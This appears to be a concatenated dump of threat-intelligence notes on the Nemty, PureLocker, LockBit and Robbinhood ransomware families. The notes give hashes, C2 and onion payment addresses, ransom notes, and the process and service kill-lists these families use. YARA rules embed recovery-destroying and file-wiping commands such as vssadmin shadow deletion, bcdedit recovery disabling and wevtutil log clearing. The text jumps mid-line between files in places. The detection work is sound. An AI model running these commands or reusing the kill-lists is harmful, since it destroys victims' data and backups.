122 | When you open our website, put the following data in the input form: 123 | Key: 124 | 125 | Extension name : 126 | hssjyh 127 | ---------------------------------------------------------------------------------------- - 128 | !!!DANGER !!! 129 | DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private keyand, as result, The Loss all data. 130 | !!!!!!!!! 131 | ONE MORE TIME : Its in your interests to get your files back.From our side, we(the best specialists) make everything for restoring, but please should not interfere. 132 | !!!!!!!!! 133 | ``` -------------------------------------------------------------------------------- /Ransomware/Nemty.md: -------------------------------------------------------------------------------- 1 | ## Nemty ransomware 2 | 3 | ## Hashes 4 | - 1d3f2ba1c701ecf04c288b64d9f2470c6f58744d5284174c1cb8e8b3753f3fae 5 | - a127323192abed93aed53648d03ca84de3b5b006b641033eb46a520b7a3c16fc 6 | 7 | ## References 8 | - https://www.tesorion.nl/nemty-2-2-and-2-3-analysis-of-their-cryptography-and-a-decryptor-for-some-file-types/ 9 | - https://www.tesorion.nl/bug-in-nemty-corrupting-the-encryption-of-large-files/ 10 | - https://id-ransomware.blogspot.com/2019/08/nemty-ransomware.html 11 | - https://twitter.com/Damian1338/status/1165584237132767242 12 | - https://twitter.com/VK_Intel/status/1214285648036859904 13 | - https://twitter.com/GrujaRS/status/1214206837500841984 14 | - https://twitter.com/GrujaRS/status/1206560801139707906 15 | - https://twitter.com/VK_Intel/status/1202858798672728064 16 | - https://twitter.com/VK_Intel/status/1207769130130182147 17 | - https://twitter.com/GrujaRS/status/1201245856801992705 18 | - https://twitter.com/demonslay335/status/1188880199674408961 19 | - https://twitter.com/VK_Intel/status/1170785426875064325 20 | - https://twitter.com/VK_Intel/status/1171065977066393600 21 | - 
https://www.acronis.com/en-us/blog/posts/threat-analysis-nemty-ransomware-and-fake-paypal-site 22 | - https://www.optiv.com/blog/nemty-ransomware-deployed-payment-service-phish 23 | - https://www.fortinet.com/blog/threat-research/nemty-ransomware-early-stage-threat.html 24 | 25 | ## Versions seen 26 | - Nemty 1.0 27 | - Nemty 1.4 28 | - Nemty 1.6 29 | - Nemty 2.0 30 | - Nemty 2.2 31 | - Nemty 2.3 32 | - Nemty 2.5 33 | 34 | ## Ransom e-mails 35 | - elzmflqxj@tutanota.de 36 | - helpdesk_nemty@aol.com 37 | 38 | ## Backup phone number 39 | - 09** *** **05 40 | 41 | ## Nemty gates 42 | ``` 43 | nemty.hk 44 | nemty10.hk 45 | nemty.top 46 | nemty.top/public/pay.php 47 | zjoxyw5mkacojk5ptn2iprkivg5clow72mjkyk5ttubzxprjjnwapkad.onion/pay 48 | ``` 49 | 50 | ## Error message on C2 gate 51 | ``` 52 | Fatal error: Uncaught [23000] - SQLSTATE[23000]: Integrity constraint violation: 1048 Column 'rsakey' cannot be null trace: #0 C:\OSPanel\domains\localhost\func\rb.php(882): RedBeanPHP\Driver\RPDO->runQuery('INSERT INTO `bo...', Array) #1 C:\OSPanel\domains\localhost\func\rb.php(919): RedBeanPHP\Driver\RPDO->GetAll('INSERT INTO `bo...', Array) #2 C:\OSPanel\domains\localhost\func\rb.php(3547): RedBeanPHP\Driver\RPDO->GetOne('INSERT INTO `bo...', Array) #3 C:\OSPanel\domains\localhost\func\rb.php(4976): RedBeanPHP\Adapter\DBAdapter->getCell('INSERT INTO `bo...', Array, 0) #4 C:\OSPanel\domains\localhost\func\rb.php(5103): RedBeanPHP\QueryWriter\AQueryWriter->insertRecord('bots', Array, Array) #5 C:\OSPanel\domains\localhost\func\rb.php(7646): RedBeanPHP\QueryWriter\AQueryWriter->updateRecord('bots', Array, 0) #6 C:\OSPanel\domains\localhost\func\rb.php(7233): RedBeanPHP\Repository\Fluid->storeBean(Object(RedBeanPHP\OODBBean)) #7 C:\OSPanel\domains\localhost\func\rb.php(8310): RedBeanPHP\Repository->store(Object(RedBeanPHP\ in C:\OSPanel\domains\localhost\func\rb.php on line 720 53 | ``` 54 | 55 | ## Notes 56 | - Developed by the same authors who previously distributed JSWorm 57 | - 
Uses an `RSA 8192-bit` public key
services 135 | ``` 136 | DbxSvc 137 | OracleXETNSListener 138 | OracleServiceXE 139 | AcrSch2Svc 140 | AcronisAgent 141 | Apache2.4 142 | SQLWriter 143 | MSSQL$SQLEXPRESS 144 | MSSQLServerADHelper100 145 | MongoDB 146 | SQLAgent$SQLEXPRESS 147 | SQLBrowser 148 | ``` 149 | 150 | ## Process killlist 151 | ``` 152 | sql 153 | winword 154 | wordpad 155 | outlook 156 | thunderbird 157 | oracle 158 | excel 159 | onenote 160 | virtualboxvm 161 | node 162 | QBW32 163 | WBGX 164 | Teams 165 | Flow 166 | ``` 167 | 168 | ## Ransom note 169 | ``` 170 | ---=== NEMTY PROJECT ===--- 171 | [+] Whats Happen? [+] 172 | Your files are encrypted, and currently unavailable. You can check it: all files on you computer has extension .nemty 173 | By the way, everything is possible to restore, but you need to follow our instructions. Otherwise, you cant return your data (NEVER). 174 | [+] What guarantees? [+] 175 | It's just a business. We absolutely do not care about you and your deals, except getting benefits. 176 | If we do not do our work and liabilities - nobody will not cooperate with us. 177 | It's not in our interests. 178 | If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. 179 | In practise - time is much more valuable than money. 180 | [+] How to get access on website? [+] 181 | 1) Download and install TOR browser from this site: https://torproject.org/ 182 | 2) Open our website: zjoxyw5mkacojk5ptn2iprkivg5clow72mjkyk5ttubzxprjjnwapkad.onion/pay 183 | When you open our website, follow the instructions and you will get your files back. 
184 | Configuration file path: C:\Users\admin 185 | ``` -------------------------------------------------------------------------------- /Ransomware/PureLocker.md: -------------------------------------------------------------------------------- 1 | # PureLocker ransomware 2 | Discovered by IBM IRIS X-Force and IntezerLabs 3 | 4 | ## SHA256 hashes 5 | `1fd15c358e2df47f5dde9ca2102c30d5e26d202642169d3b2491b89c9acc0788` 6 | `300c58478a93e4160dbbd01598d2f1df3f51519687d2c954682ecb7813386ab4` 7 | `c592c52381d43a6604b3fc657c5dc6bee61aa288bfa37e8fc54140841267338d` 8 | 9 | ## References 10 | https://exchange.xforce.ibmcloud.com/collection/99c7156cff70e1d8e1687ab7dadc8c0e 11 | https://www.intezer.com/blog-purelocker-ransomware-being-used-in-targeted-attacks-against-servers/ 12 | 13 | ## Notes 14 | - Written in PureBasic 15 | - Execute with regsvr32 /s /i 16 | - Mutex: 04780006780E6407 17 | - XOR key: D3F3CEBB972965 18 | - Decoded string: CR1 19 | - Encrypted extension: .CR1 20 | - Claims to encrypt with: AES-256-CBC + RSA-4096 21 | - Encryption: 32-byte random AES key and 16-byte random IV 22 | - Logfile: dbg.txt 23 | - Ransom note: YOUR_FILES.txt 24 | - Shadow copy adjustment: wmic shadowstorage SET MaxSpace=337000000 25 | - Ransom e-mail: cr1-silvergold1@protonmail.com 26 | 27 | ## Yara rules 28 | Some of these rules are solely VT retro,- livehunt rules and not suitable for deploying in production networks. 
29 | 30 | ```yara 31 | // VT livehunt rule - Detect new PureLocker CARO sigs 32 | rule purelocker_carosigs 33 | { 34 | meta: 35 | author = "Albert Zsigovits" 36 | reference = "c592c52381d43a6604b3fc657c5dc6bee61aa288bfa37e8fc54140841267338d" 37 | family = "PureLocker ransomware" 38 | 39 | condition: 40 | new_file 41 | and 42 | ( 43 | (signatures matches /.*PureLocker.*/) 44 | or 45 | (signatures matches /.*PURELOCKER.*/) 46 | ) 47 | } 48 | 49 | // VT livehunt rule - Detect new PureLocker based on the previously seen imphashes 50 | rule purelocker_imphash 51 | { 52 | meta: 53 | author = "Albert Zsigovits" 54 | reference = "c592c52381d43a6604b3fc657c5dc6bee61aa288bfa37e8fc54140841267338d" 55 | family = "PureLocker ransomware" 56 | 57 | condition: 58 | new_file 59 | and 60 | ( 61 | (imphash contains "cc2d1da2e5791504e1bf336fd23d0a28") 62 | or 63 | (imphash contains "59e0431c441419a7ff332859b546442e") 64 | or 65 | (imphash contains "e0b78fab94dec81f75eba07d46605381") 66 | ) 67 | } 68 | 69 | // c592c52381d43a6604b3fc657c5dc6bee61aa288bfa37e8fc54140841267338d 70 | // VT livehunt rule - Timestomped - 2001-08-17 20:52:32 71 | // FP prone 72 | import "pe" 73 | rule purelocker_timestamp 74 | { 75 | meta: 76 | author = "Albert Zsigovits" 77 | reference = "c592c52381d43a6604b3fc657c5dc6bee61aa288bfa37e8fc54140841267338d" 78 | family = "PureLocker ransomware" 79 | 80 | condition: 81 | new_file 82 | and 83 | filesize < 200KB 84 | and 85 | pe.timestamp == 998081552 86 | } 87 | 88 | // This unique resource section matches in both seen samples, but might produce FPs 89 | import "pe" 90 | rule purelocker_sections 91 | { 92 | meta: 93 | author = "Albert Zsigovits" 94 | reference = "c592c52381d43a6604b3fc657c5dc6bee61aa288bfa37e8fc54140841267338d" 95 | family = "PureLocker ransomware" 96 | 97 | condition: 98 | pe.number_of_sections == 6 99 | and 100 | pe.sections[4].name == ".rsrc" 101 | and 102 | pe.sections[4].virtual_size == 1068 103 | and 104 | pe.sections[4].raw_data_size == 1536 
105 | } 106 | 107 | // VT livehunt rule - Match on previously seen filenames, might produce FPs 108 | rule purelocker_filename 109 | { 110 | meta: 111 | author = "Albert Zsigovits" 112 | reference = "c592c52381d43a6604b3fc657c5dc6bee61aa288bfa37e8fc54140841267338d" 113 | family = "PureLocker ransomware" 114 | 115 | condition: 116 | new_file 117 | and 118 | filesize < 200KB 119 | and 120 | ( 121 | (file_name contains "cryptopp") 122 | or 123 | (file_name contains "cryptopp.dll") 124 | or 125 | (file_name contains "cryptopp_w2.dll") 126 | ) 127 | } 128 | 129 | import "pe" 130 | rule purelocker_exports 131 | { 132 | meta: 133 | author = "Albert Zsigovits" 134 | reference = "c592c52381d43a6604b3fc657c5dc6bee61aa288bfa37e8fc54140841267338d" 135 | family = "PureLocker ransomware" 136 | 137 | condition: 138 | new_file 139 | and 140 | pe.exports("DeleteMusic") 141 | and 142 | pe.exports("FindMusic") 143 | and 144 | pe.exports("MoveMusic") 145 | and 146 | pe.exports("SeekMusic") 147 | and 148 | pe.exports("UploadMusic") 149 | and 150 | pe.exports("DllRegisterServer") 151 | } 152 | 153 | rule purelocker_pe 154 | { 155 | meta: 156 | author = "Albert Zsigovits" 157 | reference = "c592c52381d43a6604b3fc657c5dc6bee61aa288bfa37e8fc54140841267338d" 158 | family = "PureLocker ransomware" 159 | 160 | strings: 161 | $file = "cryptopp.dll" 162 | $import0 = "DeleteMusic" 163 | $import1 = "FindMusic" 164 | $import2 = "MoveMusic" 165 | $import3 = "SeekMusic" 166 | $import4 = "UploadMusic" 167 | $import5 = "DllRegisterServer" 168 | 169 | condition: 170 | uint16(0) == 0x5a4d and filesize < 200KB and all of them 171 | } 172 | 173 | rule purelocker_inmemory_note 174 | { 175 | meta: 176 | author = "Albert Zsigovits" 177 | reference = "c592c52381d43a6604b3fc657c5dc6bee61aa288bfa37e8fc54140841267338d" 178 | family = "PureLocker ransomware" 179 | 180 | strings: 181 | $note0 = "To decrypt your files contact us at: cr1-silvergold1@protonmail.com" wide 182 | $note1 = "Shadows copies were removed, 
original files were overwritten, renamed and deleted using safe methods." wide 183 | $note2 = ", after that the recovery of your files will not be possible." wide 184 | $note3 = "Your private key will be deleted after 7 days starting from: " wide 185 | $note4 = "All your files have been encrypted using: AES-256-CBC + RSA-4096." wide 186 | $note5 = "Recovery is not possible without own RSA-4096 private key." wide 187 | $note6 = "Only we can decrypt your files!" wide 188 | 189 | condition: 190 | 4 of them 191 | } 192 | 193 | rule purelocker_inmemory 194 | { 195 | meta: 196 | author = "Albert Zsigovits" 197 | reference = "c592c52381d43a6604b3fc657c5dc6bee61aa288bfa37e8fc54140841267338d" 198 | family = "PureLocker ransomware" 199 | 200 | strings: 201 | $pure0 = "dbg.txt" wide 202 | $pure1 = "YOUR_FILES.txt" wide 203 | $pure2 = "CR1" wide 204 | $pure3 = "/s /i" wide 205 | $pure4 = "/V /C set " wide 206 | $pure5 = "& Nul & \"%s\" 35 | - ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 "%s" & Del /f /q "%s" 36 | 37 | ## Registry keys 38 | - SOFTWARE\LockBit 39 | - SOFTWARE\LockBit\full 40 | - SOFTWARE\LockBit\Public 41 | 42 | ## Folders skip-list 43 | ``` 44 | $windows.~bt 45 | intel 46 | msocache 47 | $recycle.bin 48 | $windows.~ws 49 | tor browser 50 | boot 51 | system volume information 52 | perflogs 53 | google 54 | application data 55 | windows 56 | windows.old 57 | appdata 58 | Windows nt 59 | Msbuild 60 | Microsoft 61 | All users 62 | Mozilla 63 | ``` 64 | 65 | ## Files skip-list 66 | ``` 67 | ntldr 68 | ntuser.dat.log 69 | bootsect.bak 70 | autorun.inf 71 | ``` 72 | 73 | ## Service stop-list 74 | ``` 75 | wrapper 76 | DefWatch 77 | ccEvtMgr 78 | ccSetMgr 79 | SavRoam 80 | Sqlservr 81 | sqlagent 82 | sqladhlp 83 | Culserver 84 | RTVscan 85 | sqlbrowser 86 | SQLADHLP 87 | QBIDPService 88 | Intuit.QuickBooks.FCS 89 | QBCFMonitorService 90 | sqlwriter 91 | msmdsrv 92 | tomcat6 93 | zhudongfangyu 94 | vmware-usbarbitator64 95 | 
vmware-converter 96 | dbsrv12 97 | dbeng8 98 | MSSQL$MICROSOFT##WID 99 | MSSQL$VEEAMSQL2012 100 | SQLAgent$VEEAMSQL2012 101 | SQLBrowser 102 | SQLWriter 103 | FishbowlMySQL 104 | MSSQL$MICROSOFT##WID 105 | MySQL57 106 | MSSQL$KAV_CS_ADMIN_KIT 107 | MSSQLServerADHelper100 108 | SQLAgent$KAV_CS_ADMIN_KIT 109 | msftesql-Exchange 110 | MSSQL$MICROSOFT##SSEE 111 | MSSQL$SBSMONITORING 112 | MSSQL$SHAREPOINT 113 | MSSQLFDLauncher$SBSMONITORING 114 | MSSQLFDLauncher$SHAREPOINT 115 | SQLAgent$SBSMONITORING 116 | SQLAgent$SHAREPOINT 117 | QBFCService 118 | QBVSS 119 | YooBackup 120 | YooIT 121 | svc$ 122 | MSSQL 123 | MSSQL$ 124 | memtas 125 | mepocs 126 | sophos 127 | veeam 128 | backup 129 | bedbg 130 | PDVFSService 131 | BackupExecVSSProvider 132 | BackupExecAgentAccelerator 133 | BackupExecAgentBrowser 134 | BackupExecDiveciMediaService 135 | BackupExecJobEngine 136 | BackupExecManagementService 137 | BackupExecRPCService 138 | MVArmor 139 | MVarmor64 140 | stc_raw_agent 141 | VSNAPVSS 142 | VeeamTransportSvc 143 | VeeamDeploymentService 144 | VeeamNFSSvc 145 | AcronisAgent 146 | ARSM 147 | AcrSch2Svc 148 | CASAD2DWebSvc 149 | CAARCUpdateSvc 150 | WSBExchange 151 | MSExchange 152 | MSExchange$ 153 | LanmanWorkstation 154 | WebClient 155 | ``` 156 | 157 | ## Process kill-list 158 | ``` 159 | wxServer 160 | wxServerView 161 | sqlmangr 162 | RAgui 163 | supervise 164 | Culture 165 | Defwatch 166 | winword 167 | QBW32 168 | QBDBMgr 169 | qbupdate 170 | axlbridge 171 | httpd 172 | fdlauncher 173 | MsDtSrvr 174 | java 175 | 360se 176 | 360doctor 177 | wdswfsafe 178 | fdhost 179 | GDscan 180 | ZhuDongFangYu 181 | QBDBMgrN 182 | mysqld 183 | AutodeskDesktopApp 184 | acwebbrowser 185 | Creative Cloud 186 | Adobe Desktop Service 187 | CoreSync 188 | Adobe CEF Helper 189 | node 190 | AdobeIPCBroker 191 | sync-taskbar 192 | sync-worker 193 | InputPersonalization 194 | AdobeCollabSync 195 | BrCtrlCntr 196 | BrCcUxSys 197 | SimplyConnectionManager 198 | Simply.SystemTrayIcon 199 | 
fbguard 200 | fbserver 201 | ONENOTEM 202 | wsa_service 203 | koaly-exp-engine-service 204 | TeamViewer_Service 205 | TeamViewer 206 | tv_w32 207 | tv_x64 208 | TitanV 209 | Ssms 210 | notepad 211 | RdrCEF 212 | oracle 213 | ocssd 214 | dbsnmp 215 | synctime 216 | agntsvc 217 | isqlplussvc 218 | xfssvccon 219 | mydesktopservice 220 | ocautoupds 221 | encsvc 222 | firefox 223 | tbirdconfig 224 | mydesktopqos 225 | ocomm 226 | dbeng50 227 | sqbcoreservice 228 | excel 229 | infopath 230 | msaccess 231 | mspub 232 | onenote 233 | outlook 234 | powerpnt 235 | steam 236 | thebat 237 | thunderbird 238 | visio 239 | wordpad 240 | bedbh 241 | vxmon 242 | benetns 243 | bengien 244 | pvlsvr 245 | beserver 246 | raw_agent_svc 247 | vsnapvss 248 | CagService 249 | DellSystemDetect 250 | EnterpriseClient 251 | VeeamDeploymentSvc 252 | ``` 253 | 254 | ## Extension list 255 | ``` 256 | .msstyles 257 | .sqlitedb 258 | .sqlite3 259 | .diagcab 260 | .diagcfg 261 | .diagpkg 262 | .sqlite 263 | .db-shm 264 | .db-wal 265 | .dacpac 266 | .theme 267 | .icns 268 | .lock 269 | .tmd 270 | .ckp 271 | .dbc 272 | .sql 273 | .mwb 274 | .rar 275 | .dbv 276 | .frm 277 | .mdf 278 | .dbt 279 | .qry 280 | .ndf 281 | .sdb 282 | .myd 283 | .mrg 284 | .db3 285 | .dbs 286 | .dbf 287 | .sdf 288 | .zip 289 | .rdp 290 | .bin 291 | .hlp 292 | .shs 293 | .drv 294 | .wpx 295 | .bat 296 | .rom 297 | .msc 298 | .spl 299 | .ps1 300 | .msu 301 | .ics 302 | .key 303 | .exe 304 | .dll 305 | .lnk 306 | .ico 307 | .hlp 308 | .sys 309 | .drv 310 | .cur 311 | .idx 312 | .ini 313 | .reg 314 | .mp3 315 | .386 316 | .cmd 317 | .ani 318 | .adv 319 | .msi 320 | .msp 321 | .com 322 | .nls 323 | .ocx 324 | .mpa 325 | .cpl 326 | .mod 327 | .hta 328 | .prf 329 | .rtp 330 | ``` 331 | 332 | ## Ransom note: 333 | ``` 334 | All your important files are encrypted! 335 | Any attempts to restore your files with the thrid-party software will be fatal for your files! 336 | RESTORE YOU DATA POSIBLE ONLY BUYING private key from us. 
337 | There is only one way to get your files back: 338 | 339 | | 1. Download Tor browser - https://www.torproject.org/ and install it. 340 | | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/? 341 | This link only works in Tor Browser! 342 | | 3. Follow the instructions on this page 343 | 344 | ### Attention! ### 345 | # Do not rename encrypted files. 346 | # Do not try to decrypt using third party software, it may cause permanent data loss. 347 | # Decryption of your files with the help of third parties may cause increased price(they add their fee to our) 348 | # Tor Browser may be blocked in your country or corporate network. Use https://bridges.torproject.org 349 | # Tor Browser user manual https://tb-manual.torproject.org/about 350 | 351 | !!! We also download huge amount of your private data, including finance information, clients personal info, network diagrams, passwords and so on. Don't forget about GDPR. 352 | ``` 353 | 354 | ## SHA256 355 | - 0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76 356 | - 0e66029132a885143b87b1e49e32663a52737bbff4ab96186e9e5e829aa2915f 357 | - 0f178bc093b6b9d25924a85d9a7dde64592215599733e83e3bbc6df219564335 358 | - 0f5d71496ab540c3395cfc024778a7ac5c6b5418f165cc753ea2b2befbd42d51 359 | - 13849c0c923bfed5ab37224d59e2d12e3e72f97dc7f539136ae09484cbe8e5e0 360 | - 15a7d528587ffc860f038bb5be5e90b79060fbba5948766d9f8aa46381ccde8a 361 | - 1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18 362 | - 1e3bf358c76f4030ffc4437d5fcd80c54bd91b361abb43a4fa6340e62d986770 363 | - 256e2bf5f3c819e0add95147b606dc314bbcbac32a801a59584f43a4575e25dc 364 | - 26b6a9fecfc9d4b4b2c2ff02885b257721687e6b820f72cf2e66c1cae2675739 365 | - 2b8117925b4b5b39192aaaea130426bda39ebb5f363102641003f2c2cb33b785 366 | - 3f29a368c48b0a851db473a70498e168d59c75b7106002ac533711ca5cfabf89 367 | - 410c884d883ebe2172507b5eadd10bc8a2ae2564ba0d33b1e84e5f3c22bd3677 368 | - 4acc0b5ed29adf00916dea7652bcab8012d83d924438a410bee32afbcdb995cc 369 | 
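- 5b9bae348788cd2a1ce0ba798f9ae9264c662097011adbd44ecfab63a8c4ae28
- 6292c2294ad1e84cd0925c31ee6deb7afd300f935004a9e8a7a43bf80034abae
- 69d9dd7fdd88f33e2343fb391ba063a65fe5ffbe649da1c5083ec4a67c525997
- 83ab7a2bcac146db472f3b930c01af5b6d3d978ead7b14a9d0ac16e1a76e9f9d
- 9bc98d15f243257c1b5bca59464abe68c680cd5482ba9f5082201dde41a016cf
- a03326ac8efa930e10091a374d40ddab9f7c2f12246d6ef7983bad93256f1f3a
- a0085da4a920e92d8f59fefa6f25551655ca911382b5e34df76a9333ac8b7214
- a08fbf01d02097094b725101309b2bf7fefc2e27724654b840b87e091aa5c9b9
- a1360645cf3113715cc023d2e4cf9f6f3a6278abcf4499f0ba7cd76c82839eb0
- c8205792fbc0a5efc6b8f0f2257514990bfaa987768c4839d413dd10721e8871
- ce8559871b410e23057393eb2d9fb76ec902da2ff1f8006ad312c81852a41f6f
- e3f236e4aeb73f8f8f0caebe46f53abbb2f71fa4b266a34ab50e01933709e877
- ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d
- ffbb6c4d8d704a530bdd557890f367ad904c09c03f53fda5615a7208a0ea3e4d

## Decryptors
- 09e956d140d6879cf7eacbb65dcbfbe1dea1961a31c5d0f834343ef2c886ccc1
- 9bc98d15f243257c1b5bca59464abe68c680cd5482ba9f5082201dde41a016cf (also listed under SHA256 above — one of the two entries is probably misfiled; verify before using it as either an encryptor or a decryptor IOC)

## VT perks:
- vhash:"015036656d5223z12z3e05031f1z37z406001a5zb7z"
- imphash:"be232aa2621354bf5dd7b405cc99198c"

## YARA rules
```
// Four CLSID strings found in the samples; 3 of 4 are required so a single
// changed/removed GUID does not break the match. Note $id2 is the only one
// with lowercase hex ("42fb") — this is how it appears in the sample and is
// matched case-sensitively; add `nocase` if you see case-normalised copies.
rule lockbit_clsids
{
    strings:
        $id1 = "{3E5FC7F9-9A51-4367-9063-A120244FBEC7}" ascii wide
        $id2 = "{D2E7041B-2927-42fb-8E9F-7CE93B6DC937}" ascii wide
        $id3 = "{02B49784-1CA2-436C-BC08-72FA3956507D}" ascii wide
        $id4 = "{BEF590BE-11A6-442A-A85B-656C1081E04C}" ascii wide

    condition:
        3 of them
}
```

```
// Single mutex name; a one-string rule, so treat a hit as a lead and
// corroborate with lockbit_cmd / lockbit_clsids.
rule lockbit_mutex
{
    strings:
        $mutex = "XO1XADpO01" ascii wide

    condition:
        all of them
}
```

```
// UAC-bypass artefacts. $uac0 is the COM elevation-moniker prefix
// ("Elevation:Administrator!new:{CLSID}"); $uac1/$uac2 are the display
// calibration class name and ICM registry path that appear next to it in
// the sample — presumably the auto-elevated COM object being abused; verify
// against the sample before documenting it as such.
//
// FIX: backslashes in a YARA text string must be escaped as "\\".
// The original "Software\Microsoft\..." contains \M, \W, \C, \I — illegal
// escape sequences — so yarac rejected the whole rule file.
rule lockbit_uac
{
    strings:
        $uac0 = "Elevation:Administrator!new:" ascii wide
        $uac1 = "DisplayCalibrator" ascii wide
        $uac2 = "Software\\Microsoft\\Windows NT\\CurrentVersion\\ICM\\Calibration" ascii wide

    condition:
        all of them
}
```

```
// Recovery-inhibition command lines exactly as embedded (case preserved —
// these are not normalised, so they will not hit on lowercase variants).
// 6 of 9 keeps the rule tolerant of builds that drop a few commands.
// Compare with the generic list in _ransom_cmd.md.
rule lockbit_cmd
{
    strings:
        $cmd0 = "vssadmin Delete Shadows /All /Quiet" ascii wide
        $cmd1 = "bcdedit /set {default} recoveryenabled No" ascii wide
        $cmd2 = "bcdedit /set {default} bootstatuspolicy ignoreallfailures" ascii wide
        $cmd3 = "wbadmin DELETE SYSTEMSTATEBACKUP" ascii wide
        $cmd4 = "wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest" ascii wide
        $cmd5 = "wmic SHADOWCOPY /nointeractive" ascii wide
        $cmd6 = "wevtutil cl security" ascii wide
        $cmd7 = "wevtutil cl system" ascii wide
        $cmd8 = "wevtutil cl application" ascii wide

    condition:
        6 of them
}
```

```
// Code patterns (x86, 32-bit). Either pattern alone is enough, so FPs are
// possible on unrelated code with the same call shape — corroborate.
rule lockbit_priv_masq
{
    strings:
        // 68 04 01 00 00 = push 0x104 (MAX_PATH-sized buffer) before an
        // indirect call; the 66-prefixed ops afterwards are 16-bit (wide
        // char) handling. Exact API not asserted here.
        $masq = { ff 15 [1-4] 85 ?? 0f [1-5] 68 04 01 00 00 8d [1-5] 50 ff 15 [1-4] 8b [1-5] 8d [1-5] 0f ?? ?? 8d ?? ?? 66 ?? ?? 8d ?? ?? 66 ?? ?? 75 ?? 0f ?? ?? [1-4] be 3f [1-3] 66 ?? ?? c7 45 ?? [1-4] 66 ?? ?? ?? }

        // "... 50 6a 04 8d ?? ?? 50 6a 13 ff 75 ?? ff 15": push &ret; push 4;
        // push &buf; push 0x13; push [token]; call — consistent with
        // GetTokenInformation(hToken, TokenLinkedToken /*19*/, &h, 4, &ret),
        // i.e. a token/privilege check; verify in the sample.
        $priv = { ff 15 [1-4] 85 ?? 74 ?? 8d ?? ?? 50 8d ?? ?? 50 6a 00 ff 15 [1-4] 85 ?? 74 ?? 39 ?? ?? 75 ?? 8d ?? ?? 50 6a 04 8d ?? ?? 50 6a 13 ff 75 ?? ff 15 [1-4] 85 ?? 7? ?? ?? ?? [1-4] 3d [1-4] 74 ?? 3d [1-4] 74 ?? 85 ?? 7f ?? 8b ?? eb ?? 0f ?? ?? 81 [1-5] eb ?? 8d ?? ?? 50 8d ?? ?? 50 ff 75 ?? ff 15 }

    condition:
        $masq or $priv
}
```
--------------------------------------------------------------------------------
/Ransomware/Robbinhood.md:
--------------------------------------------------------------------------------
# Robbinhood / Robbnhold / Robnhold ransomware

## Dropped files:
- steel.exe
- robnr.exe
- gdrv.sys
- rbnl.sys
- plist.txt

## PDB:
- C:\Users\Mikhail\Desktop\Robnhold\x64\Win7Release\Robbnhold.pdb

## Pipes (note: these are NT object-manager device / symbolic-link names — `\Device\...`, `\DosDevices\...` — as created by a kernel driver, not named pipes):
- \Device\Robnhold
- \DosDevices\Robnhold

## pList.txt:
```
gdmms.exe
sntlsrtsrvr.exe
spnsrvnt.exe
sntlkeyssrvr.exe
a2guard.exe
a2service.exe
a2start.exe
acaas.exe
acaegmgr.exe
acaif.exe
acais.exe
acctmgr.exe
ahnsd.exe
ahnsdsv.exe
alertsvc.exe
almon.exe
alsvc.exe
alunotify.exe
aluschedulersvc.exe
anti_ransom.exe
anti_ransom_gui.exe
anvir.exe
appsvc32.exe
apvxdwin.exe
ashavast.exe
ashbug.exe
ashchest.exe
ashcmd.exe
ashdisp.exe
ashenhcd.exe
ashlogv.exe
ashmaisv.exe
ashpopwz.exe
ashquick.exe
ashserv.exe
ashsimp2.exe
ashsimpl.exe
ashskpcc.exe
ashskpck.exe
ashupd.exe
ashwebsv.exe
asupport.exe
aswdisp.exe
aswidsagent.exe
aswregsvr.exe
aswserv.exe
aswupdsv.exe
aswwebsv.exe
atwsctsk.exe
autoup.exe
avadmin.exe
avas.exe
avastemupdate.exe
avastsvc.exe
avastui.exe
avcenter.exe
avcom.exe
avconfig.exe
avemupdate.exe
avengine.exe
avesvc.exe
avfwsvc.exe
avgam.exe
avgamsvr.exe
avgas.exe
avgcc.exe
avgcc32.exe
avgcefrend.exe
avgchsvx.exe
avgcmgr.exe
avgcsrva.exe
avgcsrvx.exe
avgctrl.exe
avgdiag.exe
avgemc.exe
avgemca.exe
avgemcx.exe
avgfws.exe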
avgfws8.exe 98 | avgfws9.exe 99 | avgfwsrv.exe 100 | avginet.exe 101 | avgmfapx.exe 102 | avgmsvr.exe 103 | avgnsa.exe 104 | avgnsx.exe 105 | avgnt.exe 106 | avgrsa.exe 107 | avgrssvc.exe 108 | avgrsx.exe 109 | avgscanx.exe 110 | avgserv.exe 111 | avgserv9.exe 112 | avgsvc.exe 113 | avgtray.exe 114 | avguard.exe 115 | avgui.exe 116 | avgupd.exe 117 | avgupdln.exe 118 | avgupsvc.exe 119 | avgvv.exe 120 | avgw.exe 121 | avgwb.dat 122 | avgwdsvc.exe 123 | avgwizfw.exe 124 | avira.messenger.exe 125 | avira.servicehost.exe 126 | avira.systray.exe 127 | avkbackupservice.exe 128 | avkcmd.exe 129 | avkproxy.exe 130 | avkservice.exe 131 | avktray.exe 132 | avkwctl.exe 133 | avkwctlx64.exe 134 | avkwscpe.exe 135 | avmailc.exe 136 | avmcdlg.exe 137 | avnotify.exe 138 | avp.exe 139 | avpcc.exe 140 | avpexec.exe 141 | avpm.exe 142 | avpncc.exe 143 | avps.exe 144 | avpsus.exe 145 | avpui.exe 146 | avpupd.exe 147 | avscan.exe 148 | avshadow.exe 149 | avss.exe 150 | avwebgrd.exe 151 | axengine.exe 152 | bavtray.exe 153 | bdagent.exe 154 | bdc.exe 155 | bdlite.exe 156 | bdmcon.exe 157 | bdredline.exe 158 | bdservicehost.exe 159 | bdss.exe 160 | bdsubmit.exe 161 | bdwtxag.exe 162 | bhipssvc.exe 163 | bullguard.exe 164 | bullguardbhvscanner.exe 165 | bullguardscanner.exe 166 | bullguardtray.exe 167 | bullguardupdate.exe 168 | caissdt.exe 169 | cavscan.exe 170 | cavtray.exe 171 | cavwp.exe 172 | ccap.exe 173 | ccapp.exe 174 | ccevtmgr.exe 175 | ccproxy.exe 176 | ccpxysvc.exe 177 | ccsetmgr.exe 178 | ccsvchst.exe 179 | cfpconfg.exe 180 | checkup.exe 181 | cis.exe 182 | cistray.exe 183 | cka.exe 184 | clamscan.exe 185 | clamtray.exe 186 | clamwin.exe 187 | clps.exe 188 | clpsla.exe 189 | clpsls.exe 190 | clshield.exe 191 | cmdagent.exe 192 | cmdinstall.exe 193 | cmgrdian.exe 